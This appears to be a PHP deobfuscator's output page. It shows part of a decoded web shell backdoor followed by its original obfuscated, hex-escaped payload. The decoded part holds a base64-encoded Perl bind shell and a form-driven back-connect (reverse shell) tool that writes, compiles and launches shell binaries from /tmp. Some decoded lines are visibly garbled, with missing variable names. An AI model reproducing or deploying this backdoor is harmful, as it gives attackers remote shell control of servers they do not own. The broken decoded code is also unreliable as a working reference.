	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
	echo "<h1>Network tools</h1><div class=content>
	<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.port.value,this.pass.value);return false;\'>
	<span>Bind port to /bin/sh</span><br/>
	Port: <input type=\'text\' name=\'port\' value=\'31337\'> Password: <input type=\'text\' name=\'pass\'> Using: <label><select name=\'using\'><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select></label> <input type=submit value=\'submit\'>
	</form>
	<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.server.value,this.port.value);return false;\'>
	<span>Back-connect to</span><br/>
	Server: <input type=\'text\' name=\'server\' value=". $_SERVER[\'REMOTE_ADDR\'] ."> Port: <input type=\'text\' name=\'port\' value=\'31337\'> Using: <label><select name=\'using\'><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select></label> <input type=submit value=\'submit\'>
	</form><br>";
	if(isset($_POST[\'p1\'])) {
		function cf($f,$t) {
			$w=@fopen($f,"w") or @function_exists(\'file_put_contents\');
			if($w)	{
				@fwrite($w,base64_decode($t)) or @fputs($w,base64_decode($t)) or @file_put_contents($f,base64_decode($t));
				@fclose($w);
			}
		}
		if($_POST[\'p1\'] == \'bpc\') {
			cf("/tmp/bp.c",$bind_port_c);
			$ = ex("gcc -o /tmp/bp /tmp/bp.c");
			@unlink("/tmp/bp.c");
			$ .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bp")."</pre>";
		}
		if($_POST[\'p1\'] == \'bpp\') {
			cf("/tmp/bp.pl",$bind_port_p);
			$ = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bp.pl")."</pre>";
		}
		if($_POST[\'p1\'] == \'bcc\') {
			cf("/tmp/bc.c",$back_connect_c);
			$ = ex("gcc -o /tmp/bc /tmp/bc.c");
			@unlink("/tmp/bc.c");
			$ .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bc")."</pre>";
		}
		if($_POST[\'p1\'] == \'bcp\') {
			cf("/tmp/bc.pl",$back_connect_p);
			$ = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");
			echo "<pre class=ml1>$".ex("ps aux | grep bc.pl")."</pre>";
		}
	}
	echo \'</div>\';
	hardFooter();
}
if( empty($_POST[\'a\']) )
	if(isset($) && function_exists(\'action\' . $))
		$_POST[\'a\'] = $;
	else
		$_POST[\'a\'] = \'FilesMan\';
if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )
	call_user_func(\'action\' . $_POST[\'a\']);
?>
'

Did this file decode correctly?

Original Code

<?php
$Lix = "\x3dMye9\x622jzhI\x2b7xmI5LWZZf2H/L\x41Lx8OqQJSqih\x2b082VRX4\x6220Ieo5i2\x633lSIUf4rH\x63fMJXDzXmR\x63\x62QfnhI7THYYnd\x41twHkrkl/ZjSJzXu04/fM//PE\x43OdT\x2b3wkKSfVkl8\x63xpgy\x61tXufH5q/xgNL\x41xVjevo\x619k\x622\x43/p\x619n/f16Nv\x2bv6H\x614Or692\x413\x42Rs0v7TpX/JiuZhK\x411\x61v1vpZLsYGYNMGiF6Ton28KO8PF\x42Gl\x2bl4yfKK\x633o9MgwDQk\x431\x62wmN9dkos/\x42Gu3g5dYT\x63N\x61EHDUKPYhTKjfRYoY9kVipPeyyS\x63pGiDM1ouuVJ\x41\x63i7sDPogKw6\x2biPWJt8HI//x8\x2b\x62JuQMovK248f\x42r8\x2bP7usEGedYrSTVI\x619JjQSf9MWt\x2bn1ihUs\x61L4\x63ILkqmO\x415yJWN\x410oQtUuxJxTr4MWPEJPZ0FXpD3Im\x62JD4MI\x61H5EINK5e2kVmGdOGu6Dkp1x5P8sKkL\x62vM\x41NVu\x61\x63\x61jRNGxGZx1VT7v\x2bfNt/s592x\x2b93R99FgiN\x43e7dwhHuvj2Y/HHuTZHi0IeTdzk8inVzTx/8JSPSdGoKwWV\x421Ugux503Re79L\x63nj\x2b/689Tk77eUW\x63OO\x62Mmn\x413ejNfP74wFZYFXu\x2buvDngNztgknnZJ\x41VEr9\x42XLZoJHvnnIp\x42n\x62glX2YKNe3VXYhN9gSUlhLmj\x2b2\x41y4uDyX\x61deZhws\x63j3\x430Q50iJFYt75xZe17du4\x41\x2bQIY530H\x412ERMnSJlgmx1gXz9\x62mlpuR\x42Kno38oR0Jis1mPd\x2b4R61rlonD8y3vJ4OY7\x2bwXvk\x61kXfZ1IQDUz\x42kjlLV2h98hg\x62VsP5\x63v0\x6218/Xw\x63YePM98v3tzire61PP8D2i/5gp00dEe599nK7rSYXVlueHi2Trjq/tsr\x2b60Tv\x2bU0/vTWj\x2b1Zrvvim843Hu5F\x2be3254T7d1nP9\x424\x62R9yh2QPpST0jg9Qf2Tn\x41xEHe6Z2\x43yhlXD9/XFh3MtF8ljlf5kSYuU27rG6r7/Vn\x63nTx6fh92miTzu61eXv5yrepp63l1jLThjYEUH8trnizpG9kz9qo97zuEHWQQ3j\x63oZKvz\x634DXg\x43Sz\x41UOdH0D0tVVTH1dSdn3\x42U\x61dntP90LY4jR7o33YhrQ75RrP\x62z\x41VkfOe3j\x61PTn\x2b53hW8iK6\x41qRsGg8QsWdhqro\x6340\x61K/Xs\x61SKDO7\x63o0l1fyZLXu51Tf/\x61lt40vHf9wTtttj3DW5i6PKjs\x61wshT0DFReVwv\x41oH969NPZ/d2tyIFz/JdD4tmzKRfLnf\x63ydvXM9lYWXUd5W77ojvruj8SRVyD\x2bkVD9JO/oT5p1Kx3N5Fz\x2b9Vi1kvq0Pf2\x427e\x2b5X1WHmrWYNSk5\x43p9xvteF2L\x41pPpf\x61QUgJUFJSuI\x61\x62iXd4D\x2bHhXfMuui\x2bxhvsylLnJj5Y\x63zX\x63M7hZ\x42ixvE0053eQv3uJ8X7259m3/HTLRfqPLRQIGwiNe7kqfvtP1\x61PqHzg8iJ2V7g2JoPd7\x2b\x627FT7\x41kvws57Q\x632TO\x6363zXe9\x2bFQYkh\x2bNYpXkIwm/ff85V\x4220/\x43N0\x43fwPd/\x62\x62/fzM6K477Tvufhm7T9o7/2KHtv0s88Lvo1neE\x2bp59v\x41rk\x62\x63HKeuE6x03kf\x63Gi/6lnvf9f8\x2bXnDfgjPvdX9XNf51nvt41rHf\x63d7Ig8vU\x42M519eFH\x61shZL1Ghd\x6109pHPpx\x2bPW96RnqTnt/L6\x2bNYovtSTMQDhS\x41f/\x42gX8tNj1Jr/8uHu\x42K8P0W\x63uZ\x41pVgL\x41\x2b3\x42GdT3YhftzU\x42OTknio894Px6dXu9zmeh94HYhyhu/8l92Erg\x427KEigtu5ZsI9HW6\x42vd\x2boHM481kXfpOZgTw\x41\x43oOS6VE0G2wf3hX5/3G/wT9r7utJfI7403xHe7SZ4oxzXO9OXjpKd91e\x424Riw4IenoYN5x3PN41\x62wXUS0Gfw9/Hv\x2bG\x2byJh\x63E\x42JwN26Pe8\x2b3W4\x41VX70z4OWP6LLO60jenzGNr\x42GMMH\x43\x41XnyJ\x42EF\x635l/F5\x2bU7sRzLv9\x2bd\x43zt\x62g7gH781lR2XR0I\x613hd39P0I\x2bMl\x42nz\x622Ve6O\x63S\x61\x2b7uxK\x63fkyIHk\x63g\x2bf2VvwxzOF3f/RwL\x43ohJS\x61Yu3YyV3\x62n\x2b5m9xOS\x62Qvj3Zj7rVre\x2bFoO\x62n8GDmek4\x62H4\x2bH\x61tMqj3dfZ\x41QX//xs/Q1i9nWZIpT\x2b919m9mn\x6332P\x62\x434ZTuwu\x2b/\x2bdPgFnO9qDO8tusjh\x2byTXd6Wt7J8e\x61IO4hWw\x632e9K\x419HGN/\x62\x63\x62UnuFd097n1xiZZqrH1Xe78Nve09KThEze41ut5vjvmDEdp43XUs7/57Uqore98pfL80/veyhr\x6327fe\x63Ti7l/vT1TP8xLXmD65o9Uue\x61VwoGqXN/V\x62e\x63vzv0JXej74KNPOh7/ED/kY4tTu1vGLxn\x637w7GdVYOx53MuJve3znnjG5573P9W1JPMDUG2lieW7xr\x2bIverkYv\x2bTLmo9P5\x2b\x62DTH\x41r/nPf58jDF4\x62\x62\x2b\x2bl\x62e\x2bond8lVgZfV0ZkR\x2b/YIdegO5uXfd06hfNz\x61UYXf\x2buJO9Gz8rPEjG\x2bp\x62tqP8H2zH8jeXme\x42Xke6/q3\x42He/qLXv75Dnf6ZT/XZFl3gx\x63tO/gD7gXe\x2bmRN6\x62wKxLNnvG6zIXpUF8H18Lh\x63\x2bzM\x627N/Ky73/X\x617S5r7\x2bNw2/quvp1spmP8Lni\x2bVp/uf/D9dze0sl//fSnT4NLi3N51F5pz\x6381LXeuW10zH6\x62\x41uNe/mRfd6DORHPFsp8xqXLsF\x2bsNve3rPwwv8GmjOd/Hox39Pqx92/oV7/213nPs/ZP\x62rtve\x2b693\x62zNf\x2b\x2bmq\x62v9fOg7e669vdko296pvRy\x62whQe7dT0kSm/Z9Gis7ZIqD\x42/u\x613zXM\x2b3DimjXV5e3q3O55H9lvztZ6\x63\x2biX/gvH2sdup3nUtHf2Kvu\x2bhO9k\x42w9\x63Pm\x42oe180e\x62ew\x62/55TP6wjHs/XQf6\x41n\x2b\x2b2P\x417TPg8r0ne7f/0D29pWuw6\x2bpzWs6uX1Vh3/3NQdOyfue533PV3\x4199\x62W2oXuzK7vJP4\x62\x41gOw22Ln8ttP2/VF80Tewhf4m489T3jq181N\x2b7/wTu80r657rHe/1RPr\x2be2fNuDP\x61zW89rEe0DWEn80tW7\x41s6Z/\x2bM3yf\x2b4RTdoH9\x61XnNR7q/k\x62nlrdoxNNdxsNX5\x2bLjel9/w\x427e5qT3M8r3O\x623v663g\x2b7yxW/sj\x2b6l3vZNvPZ\x2bXv8xL68F\x42e0\x626UMf7KnLW\x2bNvnwY3\x42eV9Z554mRtfg3tqeRtDR0iu0oJ\x62\x63\x61y\x425rwE\x2b\x61\x43Kf\x62Ugu\x43d/MSUnpgDGzU\x63\x619OlZeWNGo\x63v3JMQ3LQnYz9jZoJ7vvpl\x2b2\x416d130i4z\x62iHdmk\x2bow29rK3R04U\x4269\x43H1JK\x43nZf3\x42\x41k/Odm\x2bZZs\x41T3yuKnsp\x62oksvrml2\x63qM\x2bvnd4\x6236mSO6P5\x61IT7\x426dPfr9P4\x2b\x2b5\x42P\x2bvhlViyX7h\x2bNZH6vlnhyiPM\x62M4\x621jGh\x43FH\x2b2QhmXJe\x612w55p\x2bRRE7\x62jMPSqx50pHyllnD/\x63sUS\x61fJFZiEMP\x41eRxXuSF6ldfqt7Ougkq56p\x61/1i5klzMLsJO\x43\x61q\x63VGXDnivWP\x2bmRzjpoFGY8f9\x426hMR5ev3SxQQSD4VI/kFR5KPHWe\x434omIm\x63YJDESszUz\x63k\x614Kx\x62IkUz51eQufsI\x61Qrm\x41wxp775e2t\x43/t60thXXGPg\x42xR5/gy\x42vpOFqVn3gzZs4MXmUOSIQH0T\x62szQ\x61uo1zG\x43RU2sq\x62DdP8\x41V51zMw\x63HNupYoQtTpfXJQ4QeQnW3\x63jHvmxuxT\x61Tfr\x2bSUgDuFNT9\x41\x41syJwKJkOD\x63LUYUONjdv9IHRFuyTnYp0S0Undj9Y7o\x61VIGMEIN7nZk\x41JSPF/jKgGjQSe3E56y\x43tuLyqRNDHohn\x61S0x2JOqjy7\x61zuJzUe5jRp\x2bv\x62\x41OjPNpoPplRhWHJm5rZNHzOMvKtjHGg2\x42JXZn02/2f\x63L7mQyk7JQmUr0gQm6GZ7l0\x62I\x63iLip4wGJL8lJXj\x61mpuVWZWvDOJ1dl/qn\x2b\x62LuZmrdr3SeU\x61d\x2bjKJFvJhkvO\x62ojRPTfY69zOhvlwPXPTDw0iO1\x63DUI6jJ0OfNDVJW\x61\x62\x43h51OuZ63YxejQp8uQ89fTiuejg\x41\x62qjgzOtN\x62\x62IHJSygfgV5ggXHR6PYyZ\x42ODTFtp12tm\x41VFJzrZw63t\x61p3pJnh3\x63U\x62lXuOpI\x62Sn0r6mKmw\x62\x62\x63VQFpkz\x41u\x42Nl9E\x4192mN1n07jzvREKrE9xWT7mvodVFw\x63mr8VK5IGZ9\x42N140EFUu/\x43xPof\x63yLRxXtekMK\x41JLqmvIltl\x42LdpFQ\x43RR4H8\x61Ghervsl\x61Olr\x62R\x43nVH4xzs7\x2bKzx\x62eYyFZpHPU/jd9XSiheOm2Nd\x61NpYg\x424n6xWYZXOZvQpJ4iETRyo71pl2mtyxQErhUp\x626OVNzwnrP\x41vV0p39wJgyQtOqE0Tk3\x2bSUY0otHQVxrH\x43mjU71K\x61Y\x41HzWo\x43UPvfkx2nRZ\x63RvJj\x2b\x41DGPJt0Ex56pQ30H6Z53KZjivMzOtOYL\x62GrzRYk60jf\x43FjZHDoEy0dP\x41kp/u\x2b8\x6335QFq\x43224gQT8qGFFVYz\x636WJkzGd/l3GvGW\x423t\x2bPHy7QSz\x42EHmF\x41LQhk66ZvLVq/V5\x2b\x62t4iHD5ND\x2bJpj\x62gQ6T50MKS91hiMT\x42p\x62p\x62N7\x631VylkF\x42zFrw\x62grEpL46KnXDQ\x42eG\x61F0v\x617l\x61oLUSP3\x61QRf\x2b//eG53MtV\x617XND52Q\x43nng\x42Wd\x43\x630D\x623VtdT1rpeR9Vm9St\x2buQn5uNnQ43M8oEik3e\x42t7mVi\x6347q9IwVYn\x43M4hDWt9UeKUmm\x413s\x62uURGw8J\x2bGp4\x2b9zh\x2by/Yjf\x2b\x41h7\x63ogKyNYnE3k\x61\x2b\x43DuKyznJFW6yoTRKEK\x2bg\x43Esm3GuFR4\x42U\x62e7V2U2r321xGw4FjiohKM\x62Un4WSy9puPK\x624\x42YGUDOPKDPEvGwi\x62\x434kw5\x43fDPZX87Sf\x41\x2bdrxp98ivuqLJs4x0NxmStmj\x62Gg\x2b\x41rdvf97gLeTLVl4ENu8Uy\x2bG1FE9nKon0\x63yZU8NR5rp4\x61szpk15LIV1v\x42l\x63\x61wsOlLHnNqkRjmxGD2\x41m3\x42u\x610kMYw9GxdO0Upx\x41\x42h\x41ToM5o\x2bnjU9gV1j\x42D0Uw\x41\x2bYzE1KJO2nFY6s\x61PiOsMdOKjzXoesWmN5Y\x61iqieVJ\x43fJQe\x42ST0Khs\x63tdsfqxylkQ\x2bX\x61P4spFXRRE\x62kolk0YPmRHTmLP/\x61JggzwLQ7O2Moei\x41YPE7l7K7MlDIDRRLF6G\x42pkVW0U6lEmZ\x61fJ\x62wpJJ89w\x43Pxjks5YV1R4\x63EX\x61dQdS\x43KZ0qLKk4ROlFFKVlQdrIinpVXUWx6E63PYXpK4\x61U5Qfr1N\x42/\x434xiFd\x43HoLg\x63WVj0tpZvRENFF/lxRw0RWKe7DQLIHDvdnt2xDU5n3n\x63\x42\x631gPr5K6is\x42fJYQg9OMvN9ILmDJ6Li2rQj\x63xM\x2bZ9QWQORdeWfRkX5TmZHX\x2bzv2RgpEmI6RRQfZhLP8nn\x61\x42iWs9SkLOvzFh8KNIp0\x42YfuM/\x41kdLEMdtmEZsjhSszE\x63JZfuk7p\x2b4mVrzIuX/8\x2b0tVWwz\x61pN/D7rSdXVu7EMk1j2x\x43jeps0nNGf\x2bipQm\x43MvX2E7t\x418Xg9QrE35qiTuDk\x41Xl2NwitxnS\x61L\x2bHW\x42SDm\x62n4PfnExYKDZsXoZhHzSL\x628I\x62hOyU6KQy\x2b\x63tME1J42U2MjpVgUip\x41r4QzkNHSKIE\x62tR//tx4\x61Vus\x63KKZOqjRVrU3P7QVlIDGYRDWZ\x43n3D7MZ\x61O\x63hPpHvK0N\x42FujME\x62\x63QuEJWk8qnlsLgi85kSXYrQzzljkm09nU\x42Pt5\x42GUOnnZhVduJRIeU1WItuUKOkSE80q\x62W2ri4M\x2bk9E6MdhL\x42MufIkpLQm7t\x41y9v8D2mIjIj\x61TGf\x41G1wr\x61OU96k3\x63uwg/FQ01\x63MXt5R\x429oVX9ZIQGyuNVlW8pu/0\x61WMNMYRZU9qX29zzXD79eU/\x61F\x63\x61fus8qMZ\x61LLvM\x61YL5vf/h/vf\x43zfwhHlfwDqXQjvVXJLvdW9hT36uo/LO\x2btTgh7VY1nk3\x2bfsF8RWmH\x426\x63f4Hmzq9kRFD\x61Drl5Nq\x61dte\x41sz\x61s\x41\x612z\x43IFpv0YY92IjSXk\x43V4\x62Iss5UVJi\x62\x61SL6zR0\x43MLL\x2b0MIS7M\x426DMIeDvk3MTjq\x62pqqG7kyhRL9u3uDdP12Ryh2gy7YnR\x63QSjYxkgp7lYGXEMVUD\x61ol/1EsSivM\x62T\x618S6zuPT1WSY\x41JLw3wUw1w5\x43zDeHWNtkmhMt0FLSd3PSo/I\x636ZkI7DR\x2bROKZpE97zepk\x63K\x42x\x2bd\x61RhsJSLWLdorTy7ue\x43e42J1RIPRQrSX03r\x413m6\x2b\x41\x624\x43\x2bFu\x43uisnyWMGkoy145Wim26\x42U\x61n\x61H\x43D\x62QXj3/\x2b\x42nO5oEdlkFR68\x43jqUTp1kxKLYW5t5qrd9054d380X\x2bLog\x41nZ8wNNx92Ilzx\x63\x41\x638vwf/8/m\x42EJtMJ\x42H5\x6196JLw/nL3f\x61u0\x42zgKUYi8Fkq78HwW4sl6QrKxIS2iXe8J06xTwv\x62P\x2bzf/6O\x62plmw6y1fxLwPQ4imeXzEI/\x636uKUwKFzruHo8rEJ1/tk\x43ydJr\x42L6tJvn4q/DweI\x2b/IHQO\x42NXhUY/rj6Ht8Ff1Vr9M2P0\x2bkprgNDDnnDo\x2bmDZOo8XEiw\x41V1lwOD1KFm7GfZF9RjIxqPjEZgz3rw\x62wI9k\x62\x43iP13xN3\x62Nn7Q\x41wl\x62oUPdGz8v0Vo0GfrnEgnhrdF04\x42XtL\x435S\x62/6p24nfWXyhQ5rILFKu3PfNdKmD\x61vz8dPRooQFshv8\x63KiYkR7HQ\x62RMOnhX7w\x43MGQ\x62LezLrXv17MtJ9G6gzRs\x43fsgJI644MvK\x63pPtK7M\x42ks\x63HIl\x617EJ\x2bS5dVJLrW4G/\x42\x4360wF9i\x63xjtG\x43\x62k\x61\x61X0TJQ\x61F9Y\x61LieyyYn7U\x427n2\x637D3iqEy29\x63S56K6J4yY9O44dOsny21RFVOGU7RFFKdY\x616eq99el4/Tiz1\x630\x630x\x62eT3KRqH\x2bTmTOw9ozOKj7S\x2bxs4KE\x6366\x414/dQUhGRUmQmdIfv2N/XwYnjvd8IeyPqUjEJ6\x41qkpvIqoigRN7Tm\x2bnH\x62H3tytH\x63lK\x2bP2OFZ49\x430UwNJvHgrF496SL\x41Xw\x41kJuf7UHQd\x61eL5\x63g7Kl\x2bu/wnng\x2b\x410OT\x42QZd0mHQGw\x62xiDoP3z\x42M\x41s0kP2xJQN5p5g\x41Vn335H\x62jGUTFgHZPk7ILD0UiVlj/28dP\x2b\x2bVD2\x62rEnpRxyG83z8KH\x61\x62GFS4jz0VM\x62z7/823w/S0Ox44dO\x2b2ZxWVk8\x62w\x42W7\x63y4LfKoeIu89nf\x2bE\x43SYedfdrxRFNIQumTGr\x622\x2bx659RuPJ/PhRnrZ\x417T3pDdUVmHI2F6I\x43ymJ\x43ytIy2\x63S5d\x618F\x42R0N\x43mU\x42\x62\x636v1SUxu5lskheW22I9HXuSxxj1\x42i5N36GY1\x62\x2bnKt0Yh0kWFqdEKdv7qE4Xo\x62jLId\x63Rurx02fygO6I5qz\x422qzx0NkLsg\x6389Qf\x42/uGYXs\x423vEVZi71qzKXJ4SM8RJ8lH250GzKSFyZk5jDVw\x63s9ktM0s4\x42K18\x63fz0R8mn\x62\x61\x2bv\x2b56lMOfz/N\x43dUrmi1umXZl119nJDRFYl6i4tVjllgxfNgRr0gsRXLqeIleGTkwOX\x43XV\x430GT6\x63Nprg81Sq\x61I7MrPO\x61p\x41e3Spp\x6150k2VJWdFjYFNp\x624gL2\x42pyegQDL\x61Lq\x63yKP63odVW8Evi0xlxfI6Srdw\x62J/xSplyo\x43gn1l\x42\x42FldQuq\x62k\x2bLj3wzLr62r5rhvwsqWfl\x2bDN0Rmym0TiZGE7srz8D\x42vWIQXU8m\x62ERUZ1HRNGXuyN43dTOtVmXnwq0i/ORr934kN\x62ojgRy73V/mkHx7LE\x4281SmG\x43Z\x430FvMLzNT\x43KsvhGs1kIGj03qsyEFuu\x42qDLRIRpZZpqsxRZ\x63YJ\x62Zxq3sITj\x62DLntuzy1Vo73hu\x628h\x42jZWfUyoLPmJumM4VHQ2Kk\x61Uv4\x41oDXot8wQf\x42v6U/\x42Nt\x42iUliIoed\x2bfRZ3\x61I6uuw\x61\x63UnkRhgu\x41gnNO\x435976krKG9\x43S\x6164x\x6264TZ\x43Rh\x632K1URl7eXY49kYYfMP94Z\x41mEWwlFLL\x63oo\x42i\x43I\x2b/du8xGp1\x43FlDeqkGm1KYT9mUQpIFDyEYE0NE7NozDezg8imGZk\x62y\x61irQfNUlS\x61It\x61O2\x61/\x62\x2bl28ePkEjMm2L\x63uGT2Z\x42JS\x42Ws\x62Vq\x61\x41Sf6hvj\x42OtdwsV4mGfi2M\x2bQ/nRKNSikgML5t\x41\x6176\x61F\x63tXH4Z/nJ3RKKgXid/k5tjJ7GpkSVZ\x636lGneOHKPMlPgpwWnLXe4vr4g\x62lFeUJF\x41e8\x41GMNyH7ht0qVtpedux9\x41Ds2/moR\x62u0VY9UhifjO9ekeuZHI/OIQ7\x633erS4xf95oRDg\x6206mGvzjDlMwL5\x6145pYxlMyXV\x41s\x62p6r\x61YQE4ro/Nqu\x2bHr\x2bZNifOZr\x43\x427kno5p7\x2bN3S\x42TSQxM/QQL11iLSto\x43eW6epr0pEl7PYZrtmP7dh4X\x42JJ3wuQq4Lgz\x63jnNSyr\x611XRYJj94N44uD494DF1G3h8wl8e1uRRZFF4nRwNE\x43DiqPYeuSFHkRi/wr\x2bkKmGEsN\x41k9EyoJOY8hROl\x43dMTHs\x41S\x41RJkw\x42MTM\x41\x2bfiUdK4\x41liFx0Ku\x43\x2bhlrmgQg\x433\x2bQy9X1p/qFL2FFvynoJiW\x2b\x2b1vyKR0YMjEO\x62NL0YG9nHuJ4\x41M63YR902ytiDTm9v\x42UuKgVWdISnv8\x43\x62Fr\x61sVi6NOxXTR\x43xRS2w0\x43\x41jdnjrYXP\x62G0Zv6d0f\x63kRJIVE\x43iivv9tuKytHXsV\x41iv\x427WQkLpi7RQos/G2SvgoTfJSl\x62dh/yZ6\x2b2tT\x43mEeSNsoUKsYL8vIniGpZx7\x4348SWzNFVVk4F\x62\x2b\x61TJt\x43jHw3Y8o6hFkHEnJsNjxm3j0wVTVE14Wmg\x41DSPKR0v\x42KXf6\x63p\x2bPKzFEs\x63xiS1451n7jY\x62Rf\x42m1F4\x63exRmSkU2ZZE3dd481NOnV8RpdLW9jgqhf2kZ4qyF3y5q\x41Fxq\x62skWQ8vy\x61p\x41Jvfh81QoRETvm8WMU18w\x43j\x62XPSg\x43yPOHP2l8qNqw3hqIIpi\x62OS4801230Oni\x62NjwN\x61fo51FLQvQh\x61UXGmQJQdmxtWo\x61qDLrMjGx\x6192JioIP\x43S0D/UTl\x41w3HNuzwjT/Dn\x42Dj\x63KNTHynrTGZUH1Zl\x62R\x415\x43Dv/\x41Iu6fh\x422JYx9Iy0Xzj\x63\x41DJk\x42ijFutLYqZLLWN\x42THnVlDuQxGsYWNghWwJtjqFIxMj23p2i2I3\x41vQE\x63HyU6U\x61qwhpK\x62JrewlgdL/9ORZW3JuDN\x2bIJ5O3VwEpvpNSn\x63w\x62//NmJHpDKMJGFWVkv2wQYolIxXK8LTWRILedmvenNO40u5QJVvEox2zpou2yLeDSRzTEyid\x41QFfDYpGz\x2bk\x63F6Tlrjns\x42Z\x41My\x425mtLKSTtDk1eW8RoG\x63N7mH\x2bjnM9G7m\x2bph2zK8mfeYo58667dLkSmeo6mYQ\x42\x41DPmw8E1Ii3e\x2biipRivsdqHS\x2buo8\x2bFf3r\x61z5nK/5ej\x2bUpPZ7TU\x614MI6lHukN\x2bwJD62GNyuK\x42\x63tuoG0IwdN\x43xRxHsR\x62s\x42HfYfT\x42Fzg5h\x61gEhoRgrvE\x42\x61T8\x62DTez9H1sf\x63sSjhO3JET\x416hTsre\x2bQM\x439e\x63Xs4eHYp/w4nd87s4Kgjm\x41FFPXHPeihvZ\x433Eh\x41IHDfI\x414gh\x61QoVQ\x42dxsOXk/i//7rU\x42/fs/\x42jrdiKQnKo6\x610Uhl88WN1ru\x43iPfNpyr9KmIZ\x63x\x2bS\x43DWwGinuRH\x43ZXHD1pFYzI0XX\x43yU7RPuJ5rDs\x625Vy9Fo0\x434\x42dP45x6FP4\x63LsF3JQ2Q\x42i/9G34\x41eENHju8U\x43L6u0\x43dSWlF\x63Oj\x62Xxv\x431v0Uh\x2bKuvP9hl9zidOxIH1hdRvZU\x43\x2biD70\x62Vv4DIjq9hHF\x63QG2rJm\x2bpEN0HdRw4QxH\x42vIs\x6256Ww\x2bhs\x61ZuD6\x42F\x61\x625nIF7qoejDU0ys5\x62DO25W\x61i\x630qeWXlyl9VOzL\x639wu\x63p9q/sSXvepqRhXIjWg\x2bts\x43lq\x41s2m7PsDuRf\x41zD\x41pMy\x43SnsLKk7P\x635h\x2bhSWHP4IMuPKWxHvd\x62Wkd/\x2bwxXo7\x42v2my7Dire9L/KW\x62tNrE9ysXFsW\x41zNovwerzHVO\x41\x628WvqisMUiwxD2XsVThm1e\x638fQ\x41PWi8P9DEMXQf\x436lK1\x2b9d\x41Z1e96U7xw\x42iuJGgu9RvWi0qW0zs6LG\x42g\x2bsO\x2bdKO7tW4\x6212UpQ\x41mGt\x62Eoox\x43t3FEzxPuhL42k9eQ3Zq\x619WsMz7XxgfJkvXseQ9\x62Y9\x62Ux/qWtHj\x619\x2b9g9Io2Ts6Fvz\x43\x2bH4\x61dsfFUd\x42\x61m\x62oHE1hu\x63qi2vKPyDf3JT2nRp4qv\x63XG44r6\x63X7YYV56/2Nx\x61lFdh\x62it1okytq\x619YwDoGZdPNffrrYMhGiTF6GF14\x2bV\x413N\x41q61dr///\x62msmkWHJErK\x632Nz4UYGxogNG4GF7sXP29i\x6341rh53z1G7edMPYmffsxuL\x61TYSX\x63xenvE2e4H1Nsr7mgxHpfYF1EEeRvnDIIjJGi\x63oozOg4QuY8T84YwVTit\x2bO5otfez9oUYTuO2NEO\x2bxwZPP\x41ugHlhiy\x63\x61u\x2b\x41T\x63ouIrK4jpz36fYIj\x621/wH165F\x42S8jvSF6ufuSQ\x41u7fwp5Z\x41\x43165x\x4341Nrv\x61DWMKio\x41e3\x61u9Enu\x42FNXomSVp/6rxm6tWT3KzWiFjqme/\x63oJInq\x42f\x43YnMWOGyOgRzK\x2bzq\x42rPX\x41j9kyF8Xly38\x62dDzhhLwvmDPjfh\x41eIVqZFHnE\x43h1x\x41ejHsEX\x416\x61uR6\x62Pnp3jdj2ZlRfVzz\x62sP0X\x62wGuI0E1M4SJ5\x42MIr2rjvGv\x62I\x41IJ\x43\x62yQ99\x62\x618ni61G\x43\x63MDLgh\x617mThj6qfn1yf5W65GO\x62EsEMYnU\x42pF\x41p\x4269R\x43SXSIs\x43\x42Ws3Y\x4174Qkl9t7r/fgGqydp\x43\x41VoRhHeUi2\x62WzlsMsMu0fe\x63\x2b\x43j2DEpqsPrY72fjfEKXFDoKZfFr6/so\x2bLD/s\x61\x2bKypx\x63ElTpTnyZK\x42F\x42Lxdsy\x41fnoWV\x61QettW/0\x412mX14egj\x43P\x42d2\x426\x41\x2b8FmRGX1vS4WdehDVS\x42hKnnFitX8PdhWpXqod1ym7LeXUgyW\x43SjvD2\x2b3lU/4ff\x62GtO1\x63\x42tEwxslGo\x41G9\x63Y3iUIl4D\x43kI3KNSxRQF3qSg2g4gtgFIsLX\x43hNtLX\x2bgvl8H750N\x63E\x62RpYxUo3594e78Sv54uLVJhrtu5sPdG3qWL3usXPnDVwR8TuESkmfQMrE\x43fs\x43M8HxDIUVRR03iggWusqJEhTkvUPeg\x613fPDUwy4nTYo9FRYX\x42ugfX\x63jH6v\x42/jy\x62\x43S4FgSeF8ex/\x63\x62J0lUNgdEgi\x41OJg7jD3